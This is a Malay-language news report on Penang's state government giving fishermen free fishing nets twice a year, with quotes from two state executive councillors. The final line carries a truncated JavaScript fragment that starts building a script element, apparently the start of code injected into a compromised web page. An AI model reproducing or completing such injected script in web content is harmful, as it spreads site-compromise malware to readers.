Hanya nelayan P. Pinang diberi bantuan pukat dua kali setahun – Exco

Teks & Gambar : WATAWA NATAF ZULKIFLI

BATU MAUNG – Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin menyatakan bahawa nelayan di Pulau Pinang merupakan golongan yang paling bertuah sekiranya dibandingkan dengan (nelayan) negeri lain.

Jelasnya yang juga Ahli Dewan Undangan Negeri (ADUN) Seberang Jaya, sehingga kini, tiada nelayan di negeri lain yang diberi bantuan pukat sebanyak dua kali dalam tempoh setahun sebagaimana Pulau Pinang.

“Cuba tuan-tuan pergi tanya nelayan di negeri berjiranan sama ada mereka (para nelayan) menerima bantuan seperti ini atau tidak, sebab setahu saya, tiada lagi nelayan di negeri lain menerima bantuan seperti yang kita (Kerajaan Negeri Pulau Pinang) beri.

“Kewangan yang stabil dan pentadbiran yang cekap membolehkan Kerajaan Negeri menyediakan pelbagai insentif kepada rakyat dan kita (Kerajaan Negeri) mampu teruskan bantuan ini sehingga kini.

“Sumbangan kali ini merupakan kali kelima kita (Kerajaan Negeri) berikan bantuan pukat kepada tuan-tuan,” katanya pada Program Penyerahan Pukat 2015 Peringkat Zon Nelayan Pulau Pinang Selatan di Permatang Damar Laut baru-baru ini.

Hadir sama, Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna, Dato’ Abdul Malik Abul Kassim merangkap Ahli Dewan Undangan Negeri (ADUN) Batu Maung.

Seramai 500 nelayan dari Zon Pulau Pinang Selatan menerima dua set pukat mengikut permintaan pada majlis berkaitan.

Bagi seluruh Pulau Pinang, sumbangan pukat dua kali setahun berkenaan adalah membabitkan 3,121 nelayan dengan kos keseluruhan, RM1.09 juta setahun.

Dalam pada itu, Abdul Malik menyatakan bahawa sumbangan tersebut merupakan suatu penghargaan kepada golongan nelayan yang sentiasa bertungkus-lumus memastikan rakyat Pulau Pinang terus menikmati hasil laut.

“Pemberian pukat yang dianggarkan berharga RM180 ini diharap dapat meringankan sedikit beban para nelayan.

“Ini adalah kerana, kita kini dihimpit dengan masalah kelembapan ekonomi, kenaikan harga barang, cukai barangan dan perkhidmatan (GST) dan penurunan nilai mata wang,” ujar beliau.var d=document;var s=d.createElement(‘script’);